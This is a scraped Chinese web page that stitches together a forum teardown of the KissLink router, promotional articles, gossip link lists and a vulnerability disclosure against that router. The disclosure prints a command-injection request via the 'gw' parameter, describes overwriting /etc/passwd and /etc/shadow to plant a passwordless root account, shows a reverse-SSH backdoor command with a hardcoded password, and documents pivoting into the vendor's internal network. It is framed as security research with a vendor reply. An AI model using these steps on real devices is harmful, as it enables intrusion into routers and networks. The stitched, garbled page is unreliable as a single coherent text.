kiis fmlink路由器代理商

还没有帐号? 赶紧
用户版块帖子
1到第25) ? 25 :
location='read.php?tid=1166574&page='+page+'';}">页25) ? 25 :
location='read.php?tid=1166574&page='+page+'';">确认
还没吻,你就挂了~失败的KissLink路由器全网首拆……
UID:1022633
在线时间22小时
M币1575专家2
不知道大家听没听说过Kisslink,这是一个电视直销风格的路由器,一个叫囡宝的公司用它在京东众筹圈里好几百万,目前官网售价269元!口口声声企业级,看上去满眼黑科技,我本着搞一个看看到底是神马东西的精神,众筹了一把。结果,我见识了有生以来最奇葩的营销:法西斯般对待客户!在此产品的用户群里,不能问啥时候发货,不能说产品一个不字,甚至不能说其他品牌路由器一个好字,管理员各种踢人,老板出来语音发声表示支持管理员清理异己……我因为说了一句要不一人发个良民证吧,就被踢了……好吧扯远了,昨天终于收到货了,想都没想直接开拆,结果拆坏了,连吻都没吻上……▲唯一一张完好状态的照片▲顶盖卸下▲传说中蕴含了黑科技的顶盖▲主要部件是三颗LED灯▲用来KISS的红外传感器▲外套卸下,拆的比较暴力▲主控用的是AR9341,小白不评价算不算企业级▲RAM是晶豪科技的64M DDR▲那个被抹掉了芯片型号的是Flash芯片吗?小白求解▲主板背面和双天线结构,话说天线焊工极差,我轻轻一拉就断了▲话说这个U盘状的东西又是啥?▲我冒着路由器挂掉的风险拔了下了,果然是个U盘,连忙插回去,路由器果然挂了!小白不知道肿么办才好啊!求大神指导救砖!
本文内容包含图片或附件,获取更多资讯,请
后查看;或者
成为会员获得更多权限
今天京东还是淘宝来着,还有促销呢,看销量都没几个。
还有这样奇葩的群吗?
固件放U盘,还没见过这样的路由呢
对于这样的公司 我只能呵呵了
U盘样的估计就是nfc了。
黑科技,果然够黑!那个U盘,估计是号称内置多少存储的
感觉就一坑爹货。
1到第10) ? 10 : ajaxPingcp('apps.php?q=ajax&a=pingpage&tid=1166574&count=100&pid=tpc&fid=88&page='+page);}">页10) ? 10 : ajaxPingcp('apps.php?q=ajax&a=pingpage&tid=1166574&count=100&pid=tpc&fid=88&page='+page);">确认
UID:1219016
在线时间222小时
M币4296专家3
做工有点新颖,kiss怪怪的。。
UID:1022633
在线时间22小时
M币1575专家2
回 wangweipeng 的帖子
:做工有点新颖,kiss怪怪的。。 ( 09:41) 做工新颖是个啥评价啊?
UID:1190612
在线时间82小时
M币321专家0
看不出这货有啥亮点啊&& 还自插一个U盘有啥用呢? 楼主插电脑上看看这U盘内部都有啥东西
估计格式不对电脑识别不了
UID:777663
在线时间8827小时
M币43068专家18
可能这个u盘是不能拨下来的,就像某一些电器也是一样的...
UID:1253837
在线时间1040小时
M币2462专家1
不会是通着电拔下来的吧
USB 带电也不会死吧!内存带电拔都没事!
UID:1022633
在线时间22小时
M币1575专家2
回 benny3848hk 的帖子
:可能这个u盘是不能拨下来的,就像某一些电器也是一样的... ( 09:53) 能救吗?求大神指点
UID:1530717
在线时间1280小时
M币2487专家1
这个价巨亏 99以下差不多我的如意云断电安装的软件会消失掉 可以把U盘插电脑试试
UID:1022633
在线时间22小时
M币1575专家2
回 woshizhizhi 的帖子
:这个价巨亏 99以下差不多 ( 09:54) 众筹就是99一个
UID:1148214
在线时间500小时
M币1172专家1
暴利,骗钱的
1到第25) ? 25 :
location='read.php?tid=1166574&page='+page+'';}">页25) ? 25 :
location='read.php?tid=1166574&page='+page+'';">确认
温馨提示:欢迎交流讨论,请勿发布纯表情、纯引用等灌水帖子;以免被删除
您目前还是游客,请
&回复后跳转到最后一页
Code by , Time now is:07-06 15:38,
Gzip enabled&照片风格各异,时而腾空跃起,时而单手托举。
暴雨把房屋淹没,因为走得着急,40万借条没来得及拿。
声明:本文由入驻搜狐公众平台的作者撰写,除搜狐官方账号外,观点仅代表作者本人,不代表搜狐立场。
  老子不会连192.168.1.1,老子不知道路由器上那一排排灯是什么意思,配置个路由器费死老劲了,,密码太简单怕蹭网,密码太复杂,结果自己都忘了,就算老子能记得住,家里的老爸老妈又忘了呀!这一切反人类的设计难道没有人出来改改吗?!
  Kisslink路由器横空出世,简单,安全,稳定,不吻不让上,一吻就连上,就像这样
  这就是全世界最傻路由器:
  跟WiFi密码Say&goodbye!
  和网线说“Why”?
  天若有情天亦老,“吻”一下上网好不好?
  轻轻一碰,上网无需再问!
  极致简单,夫复何求?
  真实的故事:
  新一代Kisslink吻路由
  小字看不清请横屏
  女神和女汉子的区别:
  实景展示:
  什么是真智能?
  智能就是把大脑活动让机器去帮助完成,大脑活动有两种一是思考,二是记忆。
  kisslink即插即用不需思考
  kiss认证无密码不需记忆
  这难道不是一台真正的智能路由器吗?
  看着心动吗?你是不是也想来一个?那就赶快戳我!&&&&&&&(或者复制此链接:/v2/goods/1afyegiqo)
  康雅智能家居()是的综合垂直门户,秉承“”的理念,持续关注智能家居、可穿戴设备、、机器人、3D打印、智驾等诸多科技前沿领域,提供最前沿、最时尚、最实用、最专业的硬件产品介绍、硬件评测、服务定制、最新资讯、圈子交流等服务,致力于成为最具价值的智能科技信息互动平台。
  康雅智能家居【微信公众号ID:kangyajiaju】
欢迎举报抄袭、转载、暴力色情及含有欺诈和虚假信息的不良文章。
请先登录再操作
请先登录再操作
微信扫一扫分享至朋友圈
搜狐公众平台官方账号
生活时尚&搭配博主 /生活时尚自媒体 /时尚类书籍作者
搜狐网教育频道官方账号
全球最大华文占星网站-专业研究星座命理及测算服务机构
专注IT,前沿科技的一名民工!针对智能化有自己的一点浅薄的...
主演:黄晓明/陈乔恩/乔任梁/谢君豪/吕佳容/戚迹
主演:陈晓/陈妍希/张馨予/杨明娜/毛晓彤/孙耀琦
主演:陈键锋/李依晓/张迪/郑亦桐/张明明/何彦霓
主演:尚格?云顿/乔?弗拉尼甘/Bianca Bree
主演:艾斯?库珀/ 查宁?塔图姆/ 乔纳?希尔
baby14岁写真曝光
李冰冰向成龙撒娇争宠
李湘遭闺蜜曝光旧爱
美女模特教老板走秀
曝搬砖男神奇葩择偶观
柳岩被迫成赚钱工具
大屁小P虐心恋
匆匆那年大结局
乔杉遭粉丝骚扰
男闺蜜的尴尬初夜
客服热线:86-10-
客服邮箱:分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放(、、)
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
点一根红梅,抽一口寂寞;
kiss 下路由,穿透到内网。
详细说明:
隔壁的女神买了所谓不“kiss”便不让上的“kisslnk”路由器,这是对我有什么暗示吗?只怪我太年轻,“kiss”之路漫漫修远兮,屌丝还须上下去摸索。索性我也买个 kisslink 路由器来,对其一探究竟。
女神的诱惑还是蛮大的,我费了九牛二虎之力把买来的 kisslink 组成下面的网络环境,用来分析 kisslink 的安全性。
分析思路是:
1. 通过笔记本对 kisslink 扫描,用于检测路由器开放端口情况;
2. 通过 burp suite 抓取 app 和 kisslink 路由器通讯的数据,用于检测路由器是否存在漏洞;
3. 通过 openwrt 上 tcpdump 抓取 kisslink 和云端通讯数据,用于检测路由器和云端是否存在漏洞;
4. 通过 openwrt 上 tcpdump 抓取 kisslink 和云端通讯数据,获取路由器固件下载地址;
按照思路行动起来,经过漫长的 配置-&抓包-&分析-&测试过程,我们得到如下结果:
1. 路由器开放 23 端口,用户名密码未知;
code 区域$ nmap -p1-65535 **.**.**.**
Nmap scan report for **.**.**.** (**.**.**.**)
Host is up (0.0013s latency).
Not shown: 65529 closed ports
STATE SERVICE
20000/tcp open
2. 路由器某接口存在命令注入漏洞,gw 参数过滤不严格造成命令注入
code 区域POST /app.cgi HTTP/1.1
Host: **.**.**.**:442
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: KissLink/1 (iP iOS 8.1; Scale/2.00)
Accept-Language: zh-Hq=1,q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 296
dns_server=x.x.x.x&gw=x.x.x.x;ping -c 3 **.**.**.**;&id=x&ip=x.x.x.x&mask=**.**.**.**&opt=add&opttype=setup_dhcp&type=static&uuid=xxx
3. 路由器固件地址为:http://**.**.**.**:31082/NBOS-**.**.**.**6,包如下:
战果不错,其实到这里我们通过命令注入漏洞已经能够获取到路由器的权限。但是对于接近女神毫无卵用。
有了路由器的权限我们继续深挖,通过前面的命令注入漏洞,直接覆盖 /etc/passwd 和 /etc/shadow 文件,添加一个空密码的 root 用户,先登录到路由器里面,找啊找,找啊找,找到了好多有用的信息
1. 路由器启动 dropbear,但是却监听到了 **.**.**.** 的 2222 端口;
2. 在 /usr/local/sbin 目录内发现一个好有爱的 start_ssh 文件,内容:
code 区域killall -9 dbclient 2&&1 1&/dev/null
killall -9 dbclient 2&&1 1&/dev/null
/usr/local/sbin/dbclient 10000:**.**.**.**:2222 root@**.**.**.** 2&&1 1&/dev/null
dbclient 是 openwrt 下的 SSH 客户端,上面的那条命令应该是端口转发的,把路由器本地的 2222 端口转发到 **.**.**.** 这台服务器的 10000 端口
我在路由器上手动执行下这条命令
code 区域/usr/local/sbin # /usr/local/sbin/dbclient 10000:**.**.**.**:2222 root@**.**.**.** 2&&1 1&/dev/null
Host '**.**.**.**' key accepted unconditionally.
(ssh-rsa fingerprint md5 9f:30:51:bb:74:a4:91:54:85:9e:b7:fa:af:13:ba:b5)
命令没有任何错误回显,执行成功,通过 ps 和 netstat 验证下
code 区域3872 root
/usr/local/sbin/dbclient 10000:**.**.**.**:2222 root@**.**.**.**
0 **.**.**.**:55749
**.**.**.**:ssh
ESTABLISHED
请注意,我们没有输入任何密码。也就是说路由器上存放有私钥或者密码等认证信息,找啊找,找啊找,找到了,在 /etc/rc.d 目录下 kickoff.sh 这个文件,这是路由器启动初始化的脚本文件,里面有这么一行:
code 区域export DROPBEAR_PASSWORD=mask 区域*****c4890*****
在这个过程中我让同事帮我逆向了 dbclient 这个文件,看看密码是不是存放在这个文件里面,很快他就告诉我看看是不是有 DROPBEAR_PASSWORD 这个环境变量。
我们知道了 root **.**.**.** mask 区域*****c4*****
,还有什么好说的,登录呀
还记得上面所说的反弹端口吧,这个功能我揣测是官方留的调试“后门”,不过是不是所有的路由器都可以反弹呢?感觉离女神又近了,我就在服务器上继续,找啊找,找啊找,还真被我找到了,http://**.**.**.**:8080/login.html,既然我们有服务器权限,想办法登录进去
所有路由器啊,不但能够远程更新路由器固件,还能够对任意一台在线路由器启动反弹 SSH 的操作,BUT,我们不知道路由器密码。女神就在眼前,我怎么能让自己看不见,既然管理员是通过这台服务器管理的路由器,那我就想办法在管理员去管理其他路由器的时候记录下路由器的密码,反正不管你信不信,我是相信所有路由器的密码都是一样的。
功夫不负人,不日就获取到了路由器密码
code 区域mask 区域*****
女神我来了!!!
我想 kisslink 厂商自己内部肯定使用了 kisslink 路由器,我们想办法连到内网去。首先我们通过服务器的日志获取到 kisslink 办公出口 IP,不出所料应该是下面这个:
code 区域**.**.**.**
通过管理后台,查询到有下面三个路由器
通过链接 http://**.**.**.**:8080/ap_detail.php?wtpindex=5067 查看这台路由器,然后“启动反向”功能,反弹到本地的 10122 端口,我们在服务器上登录下试试
code 区域[ ~]# ssh prome@**.**.**.** -p10122
The authenticity of host '[**.**.**.**]:10122 ([**.**.**.**]:10122)' can't be established.
RSA key fingerprint is a1:b1:db:11:d8:ed:7f:b7:8b:70:c6:b7:b2:dd:f7:b9.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[**.**.**.**]:1; (RSA) to the list of known hosts.
prome@**.**.**.**'s password:
~ # /sbin/ifconfig
Link encap:Ethernet
HWaddr CC:10:A3:01:03:D2
UP BROADCAST RUNNING MULTICAST
RX packets: errors:0 dropped:0 overruns:0 frame:0
TX packets: errors:0 dropped:11 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:.3 MiB)
TX bytes: (642.1 MiB)
Link encap:Ethernet
HWaddr CC:10:A3:01:03:D3
UP BROADCAST RUNNING MULTICAST
RX packets:1408540 errors:0 dropped:0 overruns:0 frame:0
TX packets:1876604 errors:0 dropped:55169 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes: (174.5 MiB)
TX bytes: (2.1 GiB)
Link encap:Ethernet
HWaddr CC:10:A3:01:03:D0
inet addr:**.**.**.**
Bcast:**.**.**.**
Mask:**.**.**.**
UP BROADCAST RUNNING MULTICAST
RX packets:362560 errors:0 dropped:4 overruns:0 frame:0
TX packets:306375 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes: (307.3 MiB)
TX bytes:.9 MiB)
Link encap:Local Loopback
inet addr:**.**.**.**
Mask:**.**.**.**
UP LOOPBACK RUNNING
RX packets:10972 errors:0 dropped:0 overruns:0 frame:0
TX packets:10972 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:.1 MiB)
TX bytes:.1 MiB)
Link encap:Ethernet
HWaddr CC:10:A3:01:03:D2
inet addr:**.**.**.**
Bcast:**.**.**.**
Mask:**.**.**.**
UP BROADCAST RUNNING MULTICAST
RX packets: errors:0 dropped:0 overruns:0 frame:0
TX packets: errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes: (3.3 GiB)
TX bytes: (1.8 GiB)
Link encap:Ethernet
HWaddr CC:10:A3:01:03:D1
UP BROADCAST RUNNING MULTICAST
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B)
TX bytes:468 (468.0 B)
Link encap:UNSPEC
HWaddr CC-10-A3-01-03-D1-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST
RX packets: errors:0 dropped:0 overruns:0 frame:0
TX packets: errors:209039 dropped:313 overruns:0 carrier:0
collisions:0 txqueuelen:511
RX bytes:0 (0.0 B)
TX bytes:0 (0.0 B)
Interrupt:2 Memory:b1ffff
简单对内网做了下探测,**.**.**.** 应该是内部的测试服务器,
code 区域~ # wget **.**.**.**
-- 16:46:04--
http://**.**.**.**/
Connecting to **.**.**.**:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `index.html'
16:46:04 (48.7 MB/s) - `index.html' saved [13711]
index.html
~ # more index.html
&!DOCTYPE HTML PUBLIC &-//W3C//DTD HTML 3.2 Final//EN&&
&title&Index of /&/title&
&h1&Index of /&/h1&
&tr&&th valign=&top&&&img src=&/icons/blank.gif& alt=&[ICO]&&&/th&&th&&a href=&?C=N;O=D&&Name&/a&&/th&&th&&a href=&?C=M;O=A&&Last modified&/a&&/th&&th&&a href=&?C=S;O=A&&Size&/a&&/th&&th&&a href=&?C=D;O=A&&Description&/a&&/th&&/tr&
&tr&&th colspan=&5&&&hr&&/th&&/tr&
&tr&&td valign=&top&&&img src=&/icons/text.gif& alt=&[TXT]&&&/td&&td&&a href=&a.py&&a.py&/a&&/td&&td align=&right&& 10:42
&/td&&td align=&right&&528 &/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/text.gif& alt=&[TXT]&&&/td&&td&&a href=&about.html&&about.html&/a&&/td&&td align=&right&& 10:42
&/td&&td align=&right&& 17K&/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/unknown.gif& alt=&[
]&&&/td&&td&&a href=&about.php&&about.php&/a&&/td&&td align=&right&& 10:50
&/td&&td align=&right&&1.2K&/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/unknown.gif& alt=&[
]&&&/td&&td&&a href=&amqp_consumer&&amqp_consumer&/a&&/td&&td align=&right&& 14:26
&/td&&td align=&right&&108K&/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/unknown.gif& alt=&[
]&&&/td&&td&&a href=&app.cgi2&&app.cgi2&/a&&/td&&td align=&right&& 17:13
&/td&&td align=&right&&7.8K&/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/folder.gif& alt=&[DIR]&&&/td&&td&&a href=&assets/&&assets/&/a&&/td&&td align=&right&& 10:42
&/td&&td align=&right&&
- &/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/unknown.gif& alt=&[
]&&&/td&&td&&a href=&blog.php&&blog.php&/a&&/td&&td align=&right&& 10:50
&/td&&td align=&right&&1.2K&/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/text.gif& alt=&[TXT]&&&/td&&td&&a href=&cgic.c&&cgic.c&/a&&/td&&td align=&right&& 15:47
&/td&&td align=&right&& 57K&/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/text.gif& alt=&[TXT]&&&/td&&td&&a href=&cgic.h&&cgic.h&/a&&/td&&td align=&right&& 11:22
&/td&&td align=&right&&7.2K&/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/folder.gif& alt=&[DIR]&&&/td&&td&&a href=&css/&&css/&/a&&/td&&td align=&right&& 16:57
&/td&&td align=&right&&
- &/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/unknown.gif& alt=&[
]&&&/td&&td&&a href=&diff&&diff&/a&&/td&&td align=&right&& 14:22
&/td&&td align=&right&&433K&/td&&td&&&/td&&/tr&
&tr&&td valign=&top&&&img src=&/icons/folder.gif& alt=&[DIR]&&&/td&&td&&a href=&download/&&download/&/a&&/td&&td align=&right&& 10:42
该服务器的 8080 端口应该是 Bugzilla 系统
code 区域~ # wget **.**.**.**:8080
-- 16:46:21--
http://**.**.**.**:8080/
Connecting to **.**.**.**:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `index.html.1'
16:46:21 (1.59 MB/s) - `index.html.1' saved [11047]
~ # more index.html.1
&!DOCTYPE html&
&html lang=&en&&
&title&Bugzilla Main Page&/title&
&meta http-equiv=&Content-Type& content=&text/ charset=UTF-8&&
&link href=&data/assets/2f5735cf3abd04bddc8e363a.css& rel=&stylesheet& type=&text/css&&
&script type=&text/javascript& src=&data/assets/1b4eab82b604a2c23edce5.js&&&/script&
&script type=&text/javascript&&
YAHOO.namespace('bugzilla');
YAHOO.util.Event.addListener = function (el, sType, fn, obj, overrideContext) {
if ( (&onpagehide& in window || YAHOO.env.ua.gecko) && sType === &unload&) { sType = &pagehide&; };
var capture = ((sType == &focusin& || sType == &focusout&) && !YAHOO.env.ua.ie) ? true :
return this._addListener(el, this._getType(sType), fn, obj, overrideContext, capture);
if ( &onpagehide& in window || YAHOO.env.ua.gecko) {
YAHOO.util.Event._simpleRemove(window, &unload&,
YAHOO.util.Event._unload);
function unhide_language_selector() {
YAHOO.util.Dom.removeClass(
'lang_links_container', 'bz_default_hidden'
YAHOO.util.Event.onDOMReady(unhide_language_selector);
好吧,到此为止,以上所有操作均以安全研究为出发点,没有对服务器,路由器做任何多余的操作,尤其是破坏性操作,同时没有获取任何数据。
漏洞证明:
上面的详细说明已经很清楚了,这里就不再赘述。
修复方案:
看起来修复的工作量还是蛮大的:
1. 修复路由器的漏洞;
2. 修改服务器和路由器的密码;
3. 禁用后门功能;
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:20
确认时间: 12:13
厂商回复:
感谢路人甲发现我们的漏洞,我们会尽快修复
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
给力,智能路由器漏洞
太牛逼。。。。。。其实可以无限深挖的
牛逼,mark
给力,智能路由器漏洞
看到标题我就点关注了
内容精彩、文笔漂亮,很久没有这么细致的分析了
路人甲好可怕!!!
洞主吟了一首好诗!
好牛的路人甲
感谢路人甲,曾经我也以为路人甲是一个人,一直认为是大神,每天发那么多洞。
妈妈问我为什么跪着玩电脑。
清晰、细致。谢LZ。
另外,这个上面怎么没有$呢?
最后看到女神了咩?
冰山一角,科普了
学习了,思路很赞。
登录后才能发表评论,请先kisslink吻路由众筹:无需密码 酸爽到爆
  【PConline 资讯】今天逛众筹恰巧看到这个东西,小编觉得很有意思,分享给大家。在智能路由器大肆泛滥,消费者已经&审美疲劳&的今天,这款名为kisslink吻路由的产品,的确有着一些能够让人眼前一亮的设计和功能。比如,真正的0配置、无密码、一键加速,嗯还有它的小外观。目前貌似只能在找到它,发起人还没有官网。  众筹上有一小段产品的视频讲解,比这里说的直接,推荐大家直接看视频。  自11月5日上线,截至目前kisslink吻路由已筹得267余万元,笼络到了将近2万名的支持者,可见人气一斑。众筹活动一直到本月31日,对这款产品感兴趣的网友还可以参与,129元档还有很多空位。  简单了解一下。kisslink吻路由目前看有白色和粉色两版可选,产品造型相比传统路由器实在是一个天上一个地下,完全变了样,第一眼看上去还以为是个小净化器(加宽版的刮胡刀-。-);kisslink自黑&全球最傻瓜的路由器&,0配置:连上电源和网线就可以使用,并且完全脱离密码,而是采用自主研发的一种近场认证专利技术(设备碰触路由即可连接),实现真正的硬件密码;机身上那个一键加速按钮也是亮点,简单来讲就是优化网络,号称可对超过300项参数进行调优,包含100余项隐藏的芯片级参,自动让路由避开复杂干扰。  更多功能,去众筹平台看吧,这里就不详细说了。
网络设备论坛帖子排行
最新资讯离线随时看
聊天吐槽赢奖品

我要回帖

更多关于 dlink代理商 的文章

 

随机推荐